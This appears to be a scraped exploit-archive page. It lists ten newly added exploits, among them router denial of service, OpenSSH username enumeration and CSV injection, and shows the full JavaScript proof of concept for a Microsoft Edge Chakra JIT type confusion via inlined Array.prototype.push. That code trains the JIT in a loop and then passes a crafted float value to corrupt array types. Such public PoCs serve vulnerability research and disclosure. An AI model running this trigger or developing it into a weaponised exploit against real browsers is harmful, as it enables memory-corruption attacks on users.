16744756bc
10 changes to exploits/shellcodes TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC) CEWE Photoshow 6.3.4 - Denial of Service (PoC) Microsoft Edge Chakra JIT - ImplicitCallFlags Check Bypass with Intl Microsoft Edge Chakra JIT - Scope Parsing Type Confusion Microsoft Edge Chakra JIT - 'DictionaryPropertyDescriptor::CopyFrom' Type Confusion Microsoft Edge Chakra JIT - 'InlineArrayPush' Type Confusion Microsoft Edge Chakra JIT - InitializeNumberFormat and InitializeDateTimeFormat Type Confusion OpenSSH 2.3 < 7.4 - Username Enumeration (PoC) Mikrotik WinBox 6.42 - Credential Disclosure (golang) Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit) Wordpress Plugin Export Users to CSV 1.1.1 - CSV Injection WordPress Plugin Export Users to CSV 1.1.1 - CSV Injection ADM 3.1.2RHG1 - Remote Code Execution
26 lines
No EOL
667 B
JavaScript
26 lines
No EOL
667 B
JavaScript
/*
|
|
This is similar to issue 1531 . The patch seems to prevent type confusion triggered from StElemI_A instructions. But the SetItem method can also be invoked through the Array.prototype.push method which can be inlineed. We can achieve type confusion with the push method in the same way used for issue 1531 .
|
|
|
|
PoC:
|
|
*/
|
|
|
|
function opt(arr, value) {
|
|
arr.push(value); // <--------
|
|
arr[0] = 2.3023e-320;
|
|
}
|
|
|
|
function main() {
|
|
for (let i = 0; i < 0x10000; i++) {
|
|
let tmp = [1.1, 2.2, 3.3];
|
|
delete tmp[1];
|
|
|
|
opt(tmp, 2.2);
|
|
}
|
|
|
|
let arr = [1.1];
|
|
opt(arr, -5.3049894784e-314); // MAGIC VALUE!
|
|
|
|
alert(arr);
|
|
}
|
|
|
|
main(); |